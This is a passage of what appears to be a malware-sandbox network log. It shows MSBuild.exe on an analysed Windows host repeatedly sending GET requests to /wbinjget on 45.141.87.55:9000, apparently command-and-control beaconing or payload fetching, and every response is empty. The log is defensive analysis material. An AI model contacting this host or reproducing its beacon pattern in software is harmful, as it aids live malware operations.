                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:17 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.74984945.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:17.820132017 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:19.223135948 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:18 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.74985345.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:19.456589937 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:20.863957882 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:19 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          14192.168.2.74985845.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:21.094572067 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:22.458795071 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:22 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          15192.168.2.74986345.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:22.705070972 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:24.076622009 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:23 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          16192.168.2.74986645.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:24.317459106 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:25.680773020 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:25 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          17192.168.2.74987245.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:25.907349110 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:27.244968891 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:27 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          18192.168.2.74987645.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:27.490650892 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:28.851949930 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:28 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          19192.168.2.74988145.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:29.078833103 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:30.414700031 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:30 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          20192.168.2.74988545.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:30.641458035 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:32.061949968 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:31 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          21192.168.2.74988945.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:32.298288107 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:33.777853012 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:33 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          22192.168.2.74989545.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:34.000725031 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:35.313412905 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:34 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          23192.168.2.74989845.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:35.549218893 CET86OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Nov 22, 2024 15:49:36.953064919 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:36 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          24192.168.2.74990445.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:37.188425064 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:38.562915087 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:38 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          25192.168.2.74990845.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:38.817595959 CET86OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Nov 22, 2024 15:49:40.174752951 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:39 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          26192.168.2.74991345.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:40.411452055 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:41.818551064 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:41 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          27192.168.2.74991745.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:42.121330976 CET86OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Nov 22, 2024 15:49:43.448182106 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:42 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          28192.168.2.74992145.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:43.675434113 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:45.086385965 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:44 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          29192.168.2.74992745.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:45.322860003 CET86OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Nov 22, 2024 15:49:46.695895910 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:46 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          30192.168.2.74993045.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:46.926157951 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:48.304245949 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:47 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          31192.168.2.74993545.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:48.532080889 CET86OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Nov 22, 2024 15:49:49.894331932 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:48 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          32192.168.2.74993945.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:50.126928091 CET86OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Nov 22, 2024 15:49:51.536151886 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:51 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          33192.168.2.74994345.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:51.768975973 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:53.080292940 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:52 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          34192.168.2.74994845.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:53.313159943 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:54.669744015 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:54 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          35192.168.2.74995245.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:54.892285109 CET86OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Nov 22, 2024 15:49:56.221976995 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:55 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          36192.168.2.74995745.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:56.458389044 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:57.821400881 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:57 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          37192.168.2.74996245.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
